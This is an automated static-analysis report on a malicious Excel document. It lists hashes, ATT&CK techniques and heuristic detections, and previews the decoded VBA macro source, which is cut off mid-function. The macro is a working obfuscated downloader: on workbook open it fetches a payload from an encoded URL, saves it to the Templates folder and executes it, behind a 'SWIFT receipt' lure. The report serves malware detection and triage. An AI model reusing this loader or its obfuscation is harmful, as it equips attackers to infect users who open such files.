Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 6dd03646685c5f0f…

MALICIOUS

Office (OLE)

95.5 KB Created: 2020-07-13 08:23:24 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: fd1be82d683bde7bdf1ae61d2eda6827 SHA-1: de3b56b9f7c978cfa7a6e4a2533b9fc7bf0ec909 SHA-256: 6dd03646685c5f0f835db9af5c3e80e3b425fdea1595f81f62bee4550b2a7635
400 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1140 Deobfuscate or Obfuscate T1071.001 Web Protocols

The sample is an Excel document containing obfuscated VBA macros. The Workbook_Open macro is designed to execute automatically, leveraging WScript.Shell to download and save a file, likely a second-stage payload. The Arabic text in the document body, 'Please enable content to display this transaction receipt (SWIFT)', serves as a lure to trick users into enabling macros.

Heuristics 12

  • ClamAV: Xls.Macro.Obfuscation-9804250-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Macro.Obfuscation-9804250-0
  • VBA macros detected medium 7 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Set WshShell = CreateObject("WScript.Shell")
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    TGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJ = ZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYP.responseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
        Set WshShell = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Set WshShell = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ns.adobe.com/xap/1.0/ Referenced by macro
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#Referenced by macro
    • http://purl.org/dc/elements/1.1/Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 34704 bytes
SHA-256: 8eaad08341c1e2a4e92f07790a6f851f35e59328c7e0c07134890e4fa9595e48
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 113 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Slight()

End Sub

Attribute VB_Name = "ILJkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Function rTKLUHail(burgerorgan, bonusshoot)
qoxnwkqnhfshhimr = "*" & burgerorgan & "*"
Dim be3a8c1f30f1abadd648e22b16fdb57d5 As Double
be3a8c1f30f1abadd648e22b16fdb57d7 = 942.162
Dim columnwall As Byte
columnwall = 47814.429
Dim t0ea0a0840384a15e019665b2e996b73f As Long
t0ea0a0840384a15e019665b2e996b73f = 764.954
Dim n2b549c2e42dc58d564726b5780212aza As Double
n2b549c2e42dc58d564726b5780212aza = 595.115
dhmpmrvyvrxwv = vbNullString
Dim m974e3e334b64ac13b6dec997fbabf21f As String
m974e3e334b64ac13b6dec997fbabf21f = "naiveremove"
Dim b08576ffe41cb67690655f1261f410844 As Byte
b08576ffe41cb67690655f1261f410844 = 319.227
Dim z2c55929d38494d4bf3ab6ba3dd16305c As Boolean
z2c55929d38494d4bf3ab6ba3dd16305c = 93.904
Dim b9d76f7072ca3da29e82e55579143fba0 As Double
b9d76f7072ca3da29e82e55579143fba0 = 108.662
If Not bonusshoot Like qoxnwkqnhfshhimr Then
dhmpmrvyvrxwv = burgerorgan
Dim kqeepfyakmzwuediw As Double
kqeepfyakmzwuediw = 61.491
If kqeepfyakmzwuediw <> 189.252 Then
Dim flamesight As Byte
flamesight = 212.797
Dim sweartrust As Long
sweartrust = 235.981
Dim prqhhqrabc As String
prqhhqrabc = "fadzjgdilazu"
End If
End Function

Sub Workbook_Open()
Dim PYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFI As Integer
PYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFI = Chr(50) + Chr(48) + Chr(48)
  Dim WshShell As Object
    Dim SpecialPath As String

    Set WshShell = CreateObject("WScript.Shell")
    SpecialPath = WshShell.SpecialFolders("Templates")
Dim PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC
Dim TGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJ
Dim OGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKC
Dim CGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR
Dim BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW
Dim HKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNS As Integer
Dim ZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYP
Dim ZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBW
HKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNS = 1




Set ZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYP = CreateObject("microsoft.xmlhttp")
Set BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW = CreateObject("Shell.Application")

CGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR = SpecialPath + Decrypt("iYW]RS^X\N;n„n")
ZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYP.Open "get", Decrypt("q~~zG<<CD;A@;?@F;>D><`~yzv<uqot|…ƒ;n„n"), False
ZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYP.send
TGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJ = ZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYP.responseBody
If ZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYP.Status = 200 Then
Set PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC = CreateObject("adodb.stream")
PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC.Open
PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC.Type = HKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNS
PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC.Write TGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJ
PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC.SaveToFile CGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR, HKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNS + HKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNS
PTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYC.Close
End If
BPQHRTXSIMNMOBEHWDDKMOKWEZSJKUJLSQIOBBOTZNXNYIUINKTLWOTWUBJQUVZMJXYPSCGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPMUTFWCFDJRSDEITKYHXBKOJYWWVYQNQGTMUVXTGUJCZTEZUCHXXRLYJPWNWPREYW.Open (CGBQOONQIMPXLLSOPLXMCBRLVRMTYQPJJWBIVFVHQWQPQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR)
End Sub

Sub Auto_Open()
Decrypt = Template
Run
End Sub

Function rnIKJffoHfHp4e1dEwtDO8XIFLW() As Currency
Call t5IOznwCrl
End Function
Static Function t5IOznwCrl() As Integer
Call Dp62rz6kt90kDRkudpcs1fW4
End Function
Function Dp62rz6kt90kDRkudpcs1fW4() As Single
Call Yjj8AvPMFBB
End Function
Static Function Yjj8AvPMFBB() As Date
Call TJUklhzjrgwBHyE3XYkFjkdfdstyjq
End Function
Function TJUklhzjrgwBHyE3XYkFjkdfdstyjq() As Variant
Call JxU0xFkI7x
End Function
Static Function JxU0xFkI7x() As Date
Call rdzdgthwrPUM9xS2rvCsRX6Odrgfdek
End Function
Function rdzdgthwrPUM9xS2rvCsRX6Odrgfdek() As Variant
Call hx2ewrr56dArb
End Function
Static Function hx2ewrr56dArb() As Double
Call DtvgjkYXBK4r3WCbBQoVfs4z79E
End Function
Function DtvgjkYXBK4r3WCbBQoVfs4z79E() As Single
Call XZ8yZPaWPH
End Function

Function Decrypt(ZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR As String) As String

Const FIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHIN    As String = "abcdefghijklmnopqrstuvwxyz"
Const YPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODE      As String = "zebrascdfghijklmnopqtuvwxy"
Const TWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNX    As String = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
Const RWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCY      As String = "ZEBRASCDFGHIJKLMNOPQTUVWXY"

Dim IHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCH            As Long
Dim KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY            As Long
Dim CZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWV      As String
Dim YJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZF       As String
Dim RR As Byte
RR = Y78R
If ZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR & "" = "" Then Exit Function


For IHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCH = 1 To Len(ZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR)
    CZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWV = CZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWV & Chr(Asc(Mid(ZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHR, IHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCH, 1)) - 13)
Next


For IHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCH = 1 To Len(CZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWV)

    YJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZF = Mid(CZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWV, IHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCH, 1)

    Select Case Asc(YJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZF)

        Case 65 To 90
            For KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY = 1 To Len(RWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCY)
                If Mid(RWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZFQODETWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCY, KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY, 1) = YJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTYCZGOVZZF Then GoTo USub
            Next
USub:
            Decrypt = Decrypt & Mid(TWHLGVSTSUNQUDQPXSUQDQGFWQBVRYDUUOOCGMBKZMUBUTQZYKCHKIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNX, KIOWWHINYPEMCFPTNEBCBDVSVLYRYBCXKYOHEYJEZGLDDWPDOUCSBUWJDCYIHSDPSQVXFPQVZXMUENXUPFJKJLEBETZYHJKGSBWOGHRFIOTELFXLWVKBJDFRFKHQPZLXTRXGNXRWIGUVLVYDXNRRRTFIMCIHPRSOBJFWOPZNQWVMTGGTXESCREMZNSPYQCTY, 1)

        Case 97 To 122
